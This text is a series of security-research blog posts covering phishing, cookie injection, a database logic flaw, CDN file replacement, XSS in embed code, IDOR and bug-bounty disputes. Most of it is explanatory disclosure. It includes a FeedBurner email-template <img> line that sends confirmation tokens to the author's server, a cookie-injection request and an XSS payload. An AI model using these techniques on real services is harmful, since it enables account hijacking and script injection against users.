Phishing++ – Chapter I

Hi! What’s going on?

Today’s case-study is a bit different, and it is a 2-sequel article. The next chapter will be published as soon as a certain company will allow us to publicly disclose two vulnerabilities they had.

Today I’m not gonna talk about a regular attack – this whole chapter is about Phishing.

So Phishing – why the hell are we talking about it? “Its not a security issue”

I’ve heard dozens of statements about how phishing is not an actual vulnerability, and many public companies think so. Its fair to say that they are quite right – a 3rd party website that is pretending to be the real one is not an actual vulnerability on the real site.

But does that mean that the company should not care at all? No. Some companies (like PayPal, Facebook, etc.) are reporting phishing attacks to anti-virus companies, who block the user from entering the malicious site. That’s fair, but it’s not enough. There is not enough man power or even “internet crawling power” to fully protect users from malicious phishing websites. Actually, most companies does not care that there are malicious pretenders out there. In their ToS agreement, some of them rudely claim that the customer is fully responsible for any data/money lost/theft if he falls victim to a phishing attack.

But I say that there is more to do other than looking at the sky and counting birds. A small research I have conducted on some phishing websites which pretended to be PayPal and Facebook led me to write this chapter of this case-study, instead of fully presenting the vulnerability as I always do.

I realized that in order to perfect their visual appearance, phishing websites use actual photos, CSS and JavaScript elements from the original one. This means that the PayPal-like phishing site “https://xxxx.com” has image and JavaScript tags which fetch images and scripts from the original PayPal site! (or https://paypalobjects.com, to be accurate.).

Why are they doing so & why the f* should that matter?
They are doing so because they want the experience of the website to be exactly like the original. And how can that be achieved? Simple! By using the same images and JavaScript scripts.
Most of those websites has only one page – either Login (to steal the login credentials) or Pay (to steal the visa card credentials). The actual source code is a lot like the original one, accept minor changes to the way the data is being sent.
That’s matter because once a company knows that a malicious website is using it’s entities – it can stop that!

A simple fix that the company can do “tomorrow morning” is to disallow fetching of JavaScript scripts, images and CSS style sheets by an unauthorized 3rd-party website. This way, phishing websites will have to work harder in order to get the same experience and appearance of the original website.

It’s never a 100%
Even if websites will disallow unauthorized fetching of entities, phishing sites will always be able to store the images, CSS and JavaScript “on their own”. It’s a cat-mouse race that probably far from an end.
But its another step forward. Making the life of phishing sites maker harder should be a life-goal of every company and security researcher.

Heads up for the next chapter! Cheers.

Cookies And Scream

Whoa, What a summer!
I know, we haven’t been active in the last month – blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over and now its time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I talked enough about the importance of properly handling and sanitizing user supplied input. There are tons of XSS and HTML filters out there, and they are doing pretty good job.
But user input doesn’t always being shown onto the page or inserted into the DB. In some cases, many popular web platforms stores it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

Request:
GET https://cms.paypal.com/cgi-bin/marketingweb?cmd=test HTTP/1.1
Host: cms.paypal.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

Response:
HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test; domain=.paypal.com; path=/; Secure; HttpOnly

There’s no evil with storing user supplied input in a cookie, and its actually a good practice sometimes, if you don’t want to use sessions or other similar mechanism.
A very common use for user supplied input in a cookie is storing a redirect URL: Sometimes you want to remember from which page the user came from, or to where redirect him at the end of the process. Keep that in mind.
Before I’ll get to the vulnerability itself, I’ll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitation mechanism.

A very known financing company had this exact cookie functionality. User input from some GET parameters has been stored in some cookies. For example, the value of the GET parameter ‘redirect_url’ was stored in the cookie ‘return_url’. This cookie was then used by dozens of other pages in order to redirect users to a “thank you” page. An open redirect attack on that parameter was not possible, because the value of the GET parameter ‘redirect_url’ has been checked & verified before allowing it to be added as a cookie.

At first glance – everything looks fine. I’ve read the JS code that was responsible for sanitizing the input and determined that its doing its job pretty well – no HTML entities or other “bad” characters (like ‘, “) were able to be reflected – thanks to the encodeURI function that was being used intensively.

And then it hit me. encodeURI doesn’t encode characters like ; or = – The exact characters that are being used when setting a cookie!
So, a GET request to the vulnerable URL, without the ‘return_url’ GET parameter (to prevent collisions):

Request:
GET https://vulnsite.com/action?vulnGETParameter=xyz;return_url=https://fogmarks.com HTTP/1.1
.
.

Response:
HTTP/1.1 200 OK
.
.
Set-Cookie: vulnGETParameter=xyz;return_url=https://fogmarks.com; domain=.vulnsite.com; path=/; Secure; HttpOnly

The result of this in some cases was an open redirect in pages that relied on the fact the value of ‘return_url’ will always be safe.

When you decide to store user input in a cookie, you must know how to treat it well, and you must remember to dispose it when the time is right. In this case, using the same sanitation mechanism for input that will be shown onto the page and input that will be inserted to a cookie is wrong.
The patch here was simple: instead of using encodeURIencodeURIComponent() was used.

Happy & chilled autumn folks!

Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never discussed before (or maybe a little bit) – proper & secure Database management.

So Databases, we all use them. SQL-based or not,  we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, currently, the SQL-based databases (MySQL, MS-SQL etc.) are still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no;-)

So- properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? Its so obvious to manage and control my DB!”. Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanism.
b. There is only one user – the root one – and every mechanism use it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permissions set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t say, because there might be children reading these lines, and it’s bed time.

The database is one of the most holy mechanisms in the application. It doesn’t matter the type of data it stores – it should be well treated.

A well-treated DB (Database)
First, let’s set things straight – “well-treated DB” does not mean a “suffering from obesity DB”. This case-study will not discuss the type of DB collection that your application should use, rules to not flood your DB and the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real life example, and will supply some fundamental guidelines to keep your application more safe.

A very known Real Estate company, which it’s name we cannot disclose (and we respect their decision) suffered from some of the horrifying cases I described above: Their connection string was known to a lot of mechanisms, they had only one, fully-privileged root user and they didn’t have automatically periodically backups.

They had a main production DB which had a few tables. The main table was ‘user’ – a table which, among other stuff, held user Id, username (which was an email address) and salted password.

The email address was the users main identifier, and it could have been changed/replaced by the user. The change took place immediately, and until the user entered a confirmation link in the new email address he supplied, he wasn’t able to execute any “massive” action on the application, accept for information fetches. Which means – the user was still able to see his own object and data on the application.

So far so good- although the lack of awareness to the mentioned horrors (same CS, root user, no backups) – no SQL injection was possible, no CSRF was found, and the code was pretty much secured. Accept for one thing – It was not possible to supply an already existing email address when signing up, but it was possible to change email address to an existing one.

“So what?”, “What is the impact”, you say
Well, first I also thought: Meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table- it went crazy. Actions and data which was relevant to one email was relevant and visible to the other!

For example, the query to view all private assets which are related to that email looked very simple, like:

SELECT * FROM Assests WHERE EmailAddress = ‘<EMAIL_ADDRESS>’;

And resulted with private assets related to that TWO emails. An attacker could have changed his email to a victim’s one and then leak highly valued, private data.

When the company & us examined the code, we understood that another mechanism was responsible for changing the email address – and there were no existing checks at all. A simple mistake which could have led to a major disaster

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this is a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to always have one and only DB managing mechanism. Write a simple, public & shared DB wrapping mechanism that every other mechanism in your application will have access to. Don’t have a DB util to each feature, and certainly don’t allow non-related mechanisms to supply you the SQL query.
2. Don’t be naive. Check each given user data for malicious characters. Integrate your existing sanitation engine to your DB managing mechanism.
3. If you can – never delete something from the DB. Remember: restoring is harder than resetting. It is best to simply have an indication that a row is ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: Don’t allow non-certified users to execute requests that influence the DB.
5. Have a periodically, 3rd party service that backs up your DB every x hours. Provide this service a different user with only SELECT privileges.

Those 5 “gold” guidelines (and #5 is the most important, to my opinion) will assure you won’t have a heart attack when things will go wrong.
We’ll talk about having a Defibrillator later.

Unboxing

Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new grounds in the web & application research. Today we would like to present one of those new areas.

Our research in the past couple of months did not focused on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have a known definition.
Today’s case-study is exactly one of those exciting new findings. This time, the research was not a company-specific. It was a method-specific.

Method-specific research?
Its simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are being done in the top-used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is being used around the web.

In short, the SMTP protocol is being widely used by millions of web applications to send email messages to the clients. This protocol is very convenient and easy to use, and many companies have implemented it in their everyday use: swap messages between employees, communicate with customers (notifications, etc.) and many more. But the most common use right now for SMTP (or simply for ‘sending mail’) is to verify users accounts.

One of SMTP features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email is indeed being used by the client. This email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)

“SMTP allows sending HTML, so lets send XSSs to users and party hard” – Not really. Although HTML is being supported by SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML arrived in the SMTP, before parsing it and executing it to the viewer.

And that’s where I started to think: How can I hijack the verification link that users receive to their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I can include a sanitized, non-malicious HTML code, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)”>Click here!!!</a>

And it worked. The users received an email with a non-malicious HTML code. When they clicked it, the confirmation link was being logged in a server of mine.

I though: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event? Well, the answer is incredible. I’ll use the one allowed tag that is being loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)” />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML’s automatic image loading mechanism, and abused the fact the sanitized HTML could be sent over SMTP.

Google hasn’t accepted this submission. They said, and they are totally right, that the SMTP mail is being sent by FeedBurner with a content type: text/plain header, and therefore, it is the email provider’s fault that it is ignores this flag and still parses the HTML, although it is being told not to.

But still, this case-study was presented to you in order to see how everyday, “innocent & totally safe” features can be used to cause great harm.

Tokens Tokening

Our case-study today will set some ground rules for a new Anti-CSRF attitude that I was working on for the past few months. This new attitude, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don’t freak out! You’ll understand that in no time.

First, I must say that I am probably not the first one to think of this attitude. During some researches I came across the same principals of the tokens cataloging method I am about to show you.

So, What the hell is tokens cataloging you ask? It’s simple. This is an Anti-CSRF security attitude (/policy/agreement/arrangement – call it what you want) where CSRF tokens are being separated to different actions categories. This means that there will be a certain token type for input actions, such as editing a certain field or inserting new data, and there will be a different type of tokens for output actions, such as fetching sensitive information from the server, or requesting a certain private resource. These two main token groups will now lead our way to security perfectness. Whenever a user will be supplied with a form to fill, he will also be supplied with an input action token – a one-time, about-to-expire token which will only be valid to this specific session user, and will expire x minutes after its creation time. This input token will then be related to this specific form tokens family, and will only be valid in actions of this family-type.

Now, after explaining the “hard, upper layer”, let’s get down with some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new attitude separates the tokens to different families, we also use different types of tokens – some tokens should only be integers (long, of course), some should only be characters, and some should be both. When there is no need to save the token for further action, the token should not be kept in a certain data collection, and it should be generated specifically for each user.
What does it mean? That we can derive tokens from the session user’s details which we already have – we can use his session cookie, we can use his username (obfuscated, of course) and we can mix some factors in order to generate the token in a unique way, which can only be ‘understood’ by our own logic later in the token validation process. No more creating a random 32-chars long token with no meaning that could be used trillion times. Each action should have its own unique token.

“This is so frustrating and unnecessary, why should I do it?”
If you don’t care about resubmitting of forms, that’s OK. But what about anti brute forcing, or even anti-DoSing? Remember that each action that inserts or fetches data from the DB costs you in space and resources. If you don’t have the right anti brute forcing or anti DoSing mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this attitude costs you too much, simply implement some of the ideas the were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don’t want to generate a token for each user’s unique action, at least generate a token for each user’s “general” action, like output and input actions.

Once Upon A Bit

Today’s case-study is pretty short – you are going to get its intention in a matter of seconds.
We are going to talk about observation, and about the slight difference between a no-bug to a major security issue.

Every security research requires respectful amounts of attention and distinction. That’s why there are no successful industrial automatic security testers (excluding XSS testers) – because machines cannot determine all kinds of security risks. As a matter of fact, machines cannot feel danger or detect it. There is no one way for a security research to be conducted against a certain targets. The research parameters are different and varies from the target. Some researches end after a few years, some researches end after a few days and some researches end after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (to the attacker), that no further research was needed in order to get to the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozens of industrial companies and  start-ups, asked us to test its’ “database” resistance. Our goal was to leak the names of the clients from a certain type of collection – not SQL-driven one (we still haven’t got the company’s approval to publish it’s name or the type of vulnerable data collection).

So, after a few minutes of examining the queries which provide information from the data collection, I understood that the name of the data row is a must in order to do a certain action about it. If the query-issuer (=the user who asks the information about the row) has permissions to see the results of the query – a 200 OK response is being returned. If he doesn’t – again – a 200 OK response is being returned.

At first I thought that this is a correct behavior. Whether the information exists in the data collection or not – the same response is being returned.
BUT THEN, Completely by mistake, I opened the response to the non existent data row in the notepad.

The end of the 200 OK response contained an unfamiliar, UTF-8 char – one that shouldn’t be there. The length of the response from the non existent data row request was longer in 1 bit!

At first, I was confused. Why does the response to a non-existent resource contains a weird character at the end of it?
I was sure that there is a JS code which checks the response, and concludes according to that weird char – but there wasn’t.

This was one of the cases where I cannot fully explain the cause of the vulnerability, because of a simple reason – I don’t see the code behind.

The company’s response, besides total shock to the our fast response, was that “apparently, when a non-existent resource is being requested from the server, a certain sub-process which searches for this resource in the data collection fires-up and encounters a memory leak. The result of the process, by rule, should be an empty string, but when the memory leak happens, the result is a strange character. The same one which is being added to the end of the response.

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes this is more convenient and it can save a lot of time, but whenever you are using another process – you cannot fully predict its results. Remember – it can crush, freeze, force-closed by the OS or by some other process (anti-virus?).
If you must use a thread or sub-process, at least do it responsibly – make sure the OS memory isn’t full, the arguments that you pass to the process, the process’s permission to run and its possible result scenarios. Don’t ever allow the process to run or execute critical commands basing on user input information.

Independence Is Not a Dirty Word

Follow us @

Happy new year! This is the first post for year 2017.
I hope you guys weren’t too hangovered like I did. Seriously.

So, as promised in the last case-study, today we are going to see a very interesting case-study that will make you fire up those 4th of July fireworks, or do some BBQing in the park. Hmmm! Kosher Bacon! (NOTE: Bacons are not Kosher).

Everyone seem to love jQuery. This awesome “Javascript library” seems to be everywhere I look – thousands of companies use it in their website client’s side, and it is super convenient, especially when it comes to AJAX requests – importing jQuery makes our lives a whole lot easier.
jQuery is not alone. Google and Microsoft (and sometime Mozilla and Apple as well) release new JS libraries all the time, and advice developers to use them and to import them to their products. For example, if you want to play a QuickTime video, you should import Apple’s QuickTime JS library, and if you want that neat jQuery DatePicker, you should import that library from Google, jQuery or any other mirror.

Count the times I used the word ‘import’ in the last paragraph. Done? 4 times.
Whenever we want to use a certain ‘public’ JS code, which is belong to a certain company or service, we import it directly from them.
To be more clear, we simply put a <script> tag on our website, with a ‘src’ property pointing to the JS file address:

<script src=”http/s://trustworthydomain.com/path/to/js/file.js></script>

Did you get it? We are loading a script from another website – a 3rd party web site – to our website’s context. We are violating the number one rule of web security – we trust other website.

Now, this might sound a little stupid – why shouldn’t I be able to import a script from a trustworthy company like jQuery, Microsoft or Google? And you are basically right.

But,  When you are importing a script from a trustworthy company, in 90% of the time you will be importing it from the company’s CDN.
CDNs stands for Content Delivery Network, and it is a (quoted:) “is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.”

Its an hosting service which provides service to the company’s clients based on their location and a few other factors. The JS file you are importing is not being kept on the company’s official server (again- most of the times).

In this case-study we’ll see how a very popular web software company, which of course we cannot reveal yet, fell for this.

This company developed a very popular JS library and hosted it on a 3rd party CDN they purchased. That CDN was kind of ‘smart’ and redirected users to the closest server according to the user’s location:

When a request was arrived to the main server, the server determined the location of the IP and the routed the request to the nearest server according the determined location.

Dozens of websites have planted a <script src> tag in their source code to that company’s main server CDN, and it has provided their users with the necessary JS libraries everytime.

But after doing some research on the Apache server that was being on Server C (Copy C in the image), we have concluded that this server was vulnerable to an Arbitrary File Upload attack, which allowed us to upload a file to the CDN. Not that serious, at first glance.
But! When we examined the way the file was being upload, unauthorizedly of course, we saw that it is possible to use a Directory Traversal on the file path. We simply changed the filename to ../../../<company’s domain>/<product name>/<version>/<jsfilename>.js And we were able to replace the company’s legitimate JS file with a malicious one.

Basically, we had an XSS on dozens of websites and companies, without even researching them. The funny thing was that this attack affected only users who got directed to the vulnerable server (Server C).

What are we learning from this (TL;DR-FU;-)
Never trust 3rd party websites and services to do your job! I told you that millions of times already! Be independent. Be a big boy that can stay alone in the house. Simply download the JS file manually and keep it on your server!

But what happens when the JS library I am using gets updated?
Clearly, there is no easy way to keep track of it.
I advised a client of mine to simply write a cronjob or a python script that will check the latest version of the JS library available on the company’s server and then compare it to the local one. If the versions does not equal – the script sends an email to the tech team.
Or you can simply check it manually every once in a while. Big JS libraries don’t get updated that often.

So, after the horror movie you just watched, The next thing you are going to do, besides coffee, is to download your 3rd party libraries to your server.

Cheers.

API – A. P.otentially I.diotic Threat

Follow us on Twitter

Happy Hanukkah and Marry Christmas to you all!

The end of the year is always a great time to wrap things up and set goals for the next year. And also to get super-drunk, of course.

In today’s holiday-special case-study we’ll examine a case where attacker from one website can affect an entire other website, without accessing the second one at all. But before that, we need to talk a bit about Self XSS.

Basically, Self XSS is a stupid vulnerability. Ideally, to be attacked, victims need to paste ‘malicious’ JS code into their browser’s Developer Console (F12), which will cause the code to execute on the context of the page the Developer Console is active on.
When Self XSS attacks started, users were persuaded to paste the JS code in order to get a certain ‘hack’ on a website.
To deal with that, until this day Facebook prints an alert on every page’s Developer Console, in order to:

Because websites can’t avoid users to paste malicious JS code to the DC (developers console), Self XSS (SXSS) vulnerabilities are not considered high leveled vulnerabilities.

But today we’ll approach SXSS from a different angle. We are about to see how websites can innocently mislead victims into pasting ‘malicious’ JS code planted by an attacker.
Some websites allow users to plant HTML or other kind of code into their own websites or personal blogs. This HTML code is often generated by the websites themselves and being handed to the users as-is in a text box. All the users have to do is simply copy the code and paste it in their desired location.
Now, I know this is not the exact definition of an API, but this is my definition to it – a 3rd-party website is giving another website a code which provides a certain service. To my opinion – this is what API is about. If you think I’m wrong, comment down, and I will silently ignore it 😉

Some very known company which hasn’t allowed us to disclose it name yet, allowed users to get an HTML code containing data from a group the users were part of – owned or participated.
When pasted in a website, the HTML represented the last top messages in the group – their title and starting of the body.

When ‘malicious’ code was placed in the title, like: "/><img src=x onerror=alert(1)/> – nothing happen on the company’s website – they correctly sanitized and escaped the whole malicious payload.

BUT! When the HTML was representing the last messages, there was no escaping at all, and suddenly, attackers could have run malicious JS code from website A onto the context of website B! Just by planting the code in the title of the group topic.

So who’s fault is this? Who was a naughty boy and needs to be spanked?
Both websites should get a no-no talk.
Website A is the one who supplied an ‘API’ – HTML code that shows last messages from a group hosted in itself, but the API does not escapes malicious payloads correctly.
But website B violated the number one rule – never trust a 3rd-party website to do your job. Website B added an unknown code (not as an iframe, but as a script) and didn’t stated any ground rules – it blindly executed the code it was given.

A certain client asked me regarding this a few weeks ago. She said:
I must use a 3rd party code which is not an iframe, what can I do to keep my website safe?
Executing 3rd-party JS code on your website is always a bad-practice (and I’m not talking of course on code like jQuery or javascript dependencies, although I am writing these days a very interesting article addressing this exact topic. Stay tuned).
My suggested solution is: Simply plant this code in a sandboxed page, and then open an iframe to that page. ITS THAT SIMPLE!

That way, even if website A will not escape its content as expected, the sandbox, Website C will be the one who gets punished.
This, of course, does not apply for scenarios where website B’s context is a must for website A, but it will work 95% of the time.

Why I classified this case-study’s vulnerability as a Self-XSS?
Simply because I believe that when you put a 3rd-party code on your website you are doing a Self-XSS to yourself, and to all of your users.
The way I see it, Self-XSS is not just a stupid ‘paste-in-the-console’ vulnerability. Self XSS is simply using a 3rd-party code in a safe environment.

This article was the last one of 2016.
I want to thank you all for a great year. Please don’t drink too much, and if you do – don’t drink and bug hunt!
Happy holidays, and of course – happy & successful new year!

Knocking the IDOR

Are you following FogMarks?

Hello to you all.

Sorry for the no-new-posts-November, FogMarks has been very busy experiencing new fields and worlds. But now – we’re on baby!

Today’s case-study is on an old case (and by old I mean 3 months old), but due to recent developments in an active research of a very known company’s very known product, I would like to present and explain the huge importance of an Anti-IDOR mechanism. Don’t afraid, we’re not biting.

Introduction

Basically, an IDOR (Insecure Direct Object Reference) allows attacker to mess around with an object that does not belong to him. This could be the private credentials of users, like the email address, private object that the attacker should not have access to, like a private event, or public information that should simply, and rationally – not be changed by a 3rd person, like a title of a user (don’t worry – case-study about the Mozilla vulnerability is on its way).

When an attacker is able to mess around with an object that does not belongs to him, the consequences might be devastating. I am not talking just about critical information disclosure that could lead the business to the ground, I am talking about messing around with objects that could lead the attacker to execute code on the server. Don’t be so shocked – it is very much possible.

From IDOR to RCE

I’m not going to disclosed the name of the company or software that this serious vulnerability was found on. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall.
But I am going to tell you how an IDOR became an RCE on the server, without violent graphic content of course. For Christ’s sake, children might be reading these lines!

Ideally speaking,
An IDOR is being prevented using an Anti-IDOR Mechanism (AIM). Us at FogMarks have developed one a few years ago, and, know-on-wood, none of our customers ever dealt with an IDOR problem. Don’t worry, we’re not going to offer you to buy it. This mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info below, jeez!
But seriously, AIM’s main goal is to AIM the usage of a certain object only to the user who created it, or have access to it.

This is being done by holding a database table especially for sensitive objects that could be targeted from the web clients.
When an object is being inserted to the table, the mechanism generates to it a special 32 chars long identifier. This identifier is only being used by the server, and it is calld SUID (Server Used ID). In addition, the mechanism issues a 15 chars long integer identifier for the client side that is called, of course, CUID (Client Used ID). The CUID integer is being made from part of the 32 chars long SUID and part of the object permanent details (like name-if name cannot be changed afterwards) using a special algorithm.

In the users’ permissions table there is also a row of list of nodes that contains the SUID of objects that the user has access to it.

When the user issues a request from the client side (from the JS – a simple HTTP request (POST/GET/OPTIONS/DELETE/PUT…), the CUID is being matched with the SUID – the algorithm tries to generate the SUID from the supplied CUID. If it succeed, it then tries to match the generated SUID the SUIDs list in the users’ permission table. If it match, the requesting user gets one time, limited access to the object. This one time access is being enabled for x minutes and for one static IP, until the next process of matching CUID to SUID.

All this process, of course, is being managed by only one mechanism – The AIM. AIM handles request in a queue form, so when dealing with multiple hundreds of requests – AIM might not be the perfect solution (due to possible object changes by 2 different users).

In conclusion, in order to keep your platform cure from IDORs, requests to access sensitive objects should be managed only by one mechanism. You don’t have to do the exact logic like we did and to compile two different identifiers to the same object, but if you’ll like to prevent IDORs from the first moment (simply spoofing the ID), our proposed solution is for the best.

Here are some more examples of IDORs found by FogMarks in some very popular companies (and were patched, of course):

The Beauty And The Thoughtful

Are you following FogMarks?

Today’s case-study is based on some recent events and misunderstandings I had with Facebook, and its main goal is to set researchers expectations from bug bounty programs. Both sides will be presented, of course, and you will be able to comment your opinion in the comments section.

So, back in July I have found that it is possible to link between Scrapebooks that users have opened for their pets or family members to the users themselves (who relate to the pet or family member), even if the privacy setting of the user to the pet or family member was set to ‘Only me’.

This was possible to be done by any user, even if the user was not friends with the victim. All he had to do was to access this Facebooks’s mobile URL: http://m.facebook.com/<SCRAPEBOOK_ID>/

After accessing this URL, the attacker was redirected to another URL: https://m.facebook.com/<CREATOR_FACEBOOK_USER_ID>/scrapbooks/ft.<SCRAPEBOOK_ID>/?_rdr

and the name and the type of the Scrapebook was displayed, even if the privacy setting of it was set to ‘Only me’ by the creating user (the victim).

12 days after the initial report Facebook said that the issue was ‘not reproduceable’, and after my reply I was asked to provide even more information, so I have created a full PoC video. Watch it to get the full picture and only then continue to read.

So, as you can see accessing the supplied URL indeed redirected the attacker to the Scrapebook account that was made by the victim, and revealed the Scrapebook name – which is not private, and the Scrapebook maker ID (the FBID of the victim user).

5 days after I have sent the PoC video Facebook finally acknowledged it and sent it forward for a fix.

2 months after the acknowledgement I have received a mail from Facebook, asking me to confirm the patch. They simply denied from unauthorized users to access the vulnerable URL and then to be redirected to the Scrapebook.

2 days after I confirmed the patch, I got a long mail reply stating:

Thanks for confirming the fix. I’ve discussed this report with the team and unfortunately we’ve determined that this report does not qualify under our program.

Ultimately the risk here was that someone who could guess the FBID of a scrapbook could see the owner of that scrapbook. The “name” here isn’t a private piece of information: it will show up whenever the child or pet is tagged, for example, and so any changes related to that aren’t particularly relevant here. The risk of someone searching such a large space of potential IDs in the hope of finding a particular type of object (rare) in a particular configuration (even rarer) makes it highly implausible that any information would be inadvertently discovered here. Even if you were to look through the space your search would be untargeted and could not recover information about a particular person.

In general we attempt to determine whether or not a report qualifies under our program shortly after the initial report is submitted. In this case we failed to do so, and you have my apologies for that. Please let me know if you have any additional questions here.

Or in short: Thanks for confirming the fix, we now see after we fixed it that the impact of the vulnerability was able to be achieved after some hard work – iterating over Scrapebook IDs, so the report is not qualified and you won’t be awarded for it.

And now I am asking: How rude can it be to hold a vulnerability for 3 months, fix it, and then, only then, after the fix is deployed in the production and there is no way to demonstrate another impact aspect, say to the researcher: “Thanks, but no thanks”.

This case-study is here to demonstrate researchers the various opinions that exist for every report. In your opinion the vulnerability is severe, a must-fix that should not even be questioned, but in the eyes of the company or the person who validates the vulnerability – it is a feature, not a bug.

I would like to hear your opinion regarding this in the comments section below, on Twitter or by email.